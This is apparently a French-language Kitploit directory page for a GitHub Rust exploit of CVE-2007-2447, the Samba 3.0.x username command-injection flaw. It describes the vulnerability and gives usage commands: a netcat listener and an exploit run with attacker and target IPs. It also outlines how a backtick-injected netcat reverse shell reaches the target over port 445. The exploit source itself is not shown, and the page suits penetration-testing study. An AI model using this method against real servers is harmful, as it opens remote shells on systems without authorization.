Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2007-2447 — Une implémentation Rust autonome de l'exploit CVE-2007-2447 ciblant Samba smbd 3.0.20-Debian. | Kitploit
Outils/GitHubGitHub/nika0x38/cve-2007-2447
Analyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Une implémentation Rust autonome de l'exploit CVE-2007-2447 ciblant Samba smbd 3.0.20-Debian.

Voir le dépôt
1il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Samba CVE-2007-2447

Rust Security

Une implémentation Rust autonome de l'exploit CVE-2007-2447 ciblant Samba smbd 3.0.20-Debian.

Description de la vulnérabilité

CVE-2007-2447 est une vulnérabilité d'injection de commandes dans les versions 3.0.0 à 3.0.25rc3 de Samba. La vulnérabilité existe dans la fonction SamrChangePassword(), qui ne nettoie pas correctement les entrées utilisateur, permettant aux attaquants d'exécuter des commandes arbitraires via des métacaractères shell dans le champ du nom d'utilisateur lors de l'authentification SMB.

Prérequis

  • Rust installé sur votre système
  • Cible exécutant une version vulnérable de Samba
  • La cible doit disposer de netcat (généralement installé par défaut)

Utilisation

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

Exemple

root@kitploit:~
# Configurez un écouteur netcat
nc -lvnp 4444

# Exécutez l'exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

Options

  • --lhost : Adresse IP de votre machine attaquante
  • --lport : Port pour recevoir la connexion du shell inverse
  • --target : Adresse IP de la machine cible

Fonctionnement

  1. Génère une charge utile de shell inverse netcat directement dans le code
  2. Injecte la charge utile dans le champ du nom d'utilisateur SMB à l'aide d'accents graves (backticks)
  3. Envoie une requête SMB Session Setup malformée au port 445
  4. Exploite l'injection de commandes dans le traitement du nom d'utilisateur de Samba
  5. Exécute la charge utile de shell inverse sur la cible

Fonctionnalités

  • Autonome : Aucune dépendance externe comme Metasploit n'est requise
  • Portable : Fonctionne sur tout système avec Rust installé
  • Rapide : Aucun lancement de processus externe

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de

Télécharger l’outil